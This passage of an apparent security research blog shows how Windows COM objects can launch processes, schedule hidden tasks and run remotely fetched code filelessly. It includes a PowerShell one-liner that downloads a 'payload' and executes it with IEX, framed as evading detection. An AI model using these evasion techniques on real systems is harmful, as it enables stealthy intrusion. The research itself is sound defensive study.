The user-controlled string is validated against a specific pattern. In this case, the string must match slui.exe. Furthermore, the user-controlled string is then appended to the system path, meaning it would be necessary to, for instance, replace the real slui.exe to circumvent the check. Unfortunately, the validation performed by Microsoft limits the usefulness of this method as a general-purpose process launcher.

In other cases, code execution was straightforward. One example is the ProcessChain class with CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}, implemented in C:\Program Files (x86)\Windows Kits\10\App Certification Kit\prchauto.dll. This COM class can be analyzed without looking at any disassembly listings, because prchauto.dll contains a TYPELIB resource holding a COM type library that can be viewed with Oleview.exe. Figure 7 shows the type library for ProcessChainLib, which exposes a CommandLine property and a Start method. Start accepts a reference to a Boolean value.


Figure 7: Type library for ProcessChainLib as displayed in Interface Definition Language by Oleview.exe

Based on this, commands can be started as shown in Figure 8.

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))
$handle.CommandLine = "cmd /c whoami"
$handle.Start([ref]$True)

Figure 8: Using the ProcessChainLib COM server to start a process

Enumerating and examining COM objects in this fashion turned up other interesting finds as well.

Fileless Download and Execute

For instance, the COM object {F5078F35-C551-11D3-89B9-0000F81FE221} (Msxml2.XMLHTTP.3.0) exposes XML HTTP 3.0 functionality that can be used to download arbitrary code for execution without writing the payload to disk and without triggering rules that look for the commonly used System.Net.WebClient. The XML HTTP 3.0 object is normally used to perform AJAX requests; in this case, the fetched data can be executed directly with the Invoke-Expression cmdlet (IEX).

The example in Figure 9 executes our code locally:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;

Figure 9: Fileless download without System.Net.WebClient

Task Scheduling

Another example is {0F87369F-A4E5-4CFC-BD3E-73E6154572DD}, which implements the Schedule.Service class for interacting with the Windows Task Scheduler service. This COM object allows privileged users to schedule a task on a host (including a remote host) without using the schtasks.exe binary or the at command. Figure 10 shows a task being scheduled this way; the Convert-Date helper simply formats a DateTime into the ISO 8601 string the Task Scheduler expects.

function Convert-Date {
    # Format a DateTime as the UTC ISO 8601 string the Task Scheduler expects
    param(
        [datetime]$Date
    )
    PROCESS {
        $Date.ToUniversalTime().ToString("u") -replace " ","T"
    }
}

$Delay = 30                                   # seconds until the task fires
$TaskName = [Guid]::NewGuid().ToString()
$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))
$Instance.Connect()
$Folder = $Instance.GetFolder("\")
$Task = $Instance.NewTask(0)
$Trigger = $Task.Triggers.Create(1)           # 1 = TASK_TRIGGER_TIME
$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).AddSeconds($Delay))
$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).AddSeconds($Delay + 120))
$Trigger.ExecutionTimeLimit = "PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $TaskName
$Action = $Task.Actions.Create(0)             # 0 = TASK_ACTION_EXEC
$Action.Path = "cmd.exe"
$Action.Arguments = "/c whoami"
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)   # 6 = TASK_CREATE_OR_UPDATE, 3 = TASK_LOGON_INTERACTIVE_TOKEN

Figure 10: Scheduling a task

Conclusion

COM objects are powerful, versatile, and integrated with Windows, which means that they are nearly always available. COM objects can be used to subvert detection patterns based on command-line arguments, PowerShell logging, and heuristics. Stay tuned for part 2 of this blog series, where we will continue to look at hunting COM objects.